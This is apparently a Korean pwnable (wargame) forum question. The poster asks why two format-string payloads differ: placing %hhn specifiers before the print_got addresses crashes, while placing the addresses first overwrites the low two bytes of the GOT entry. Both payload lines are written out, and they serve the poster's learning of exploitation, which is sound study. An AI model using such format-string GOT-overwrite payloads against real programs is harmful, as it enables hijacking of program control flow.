완료됨
주소와 포맷스트링의 순서에 따라 결과가 다르게 나옵니다
-
payload = b'%105c%7$hhn' + b'%29c%8$hhnAAA' + p32(print_got) + p32(print_got+1)
-
payload = p32(print_got) + p32(print_got+1) + b'%97c%1$hhn' + b'%29c%2$hhn'
(1번)포맷스트링 + 주소의 경우에는 seg fault가 발생하고
(2번)주소 + 포맷스트링의 경우에는 print_got의 하위 2바이트가 정상적으로 덮어씌워졌습니다. 왜 동일한 코드(제가 생각하기에는요)인데 결과가 다르게 나오는지 궁금합니다.
#pwnable
작성자 정보
